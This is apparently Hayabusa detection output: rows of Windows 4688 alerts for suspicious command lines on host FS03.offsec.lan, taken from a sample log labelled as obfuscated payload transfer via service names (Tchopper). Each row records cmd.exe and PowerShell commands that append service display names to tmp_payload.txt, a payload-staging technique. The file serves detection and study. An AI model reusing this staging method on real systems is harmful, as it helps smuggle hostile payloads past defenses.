+2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
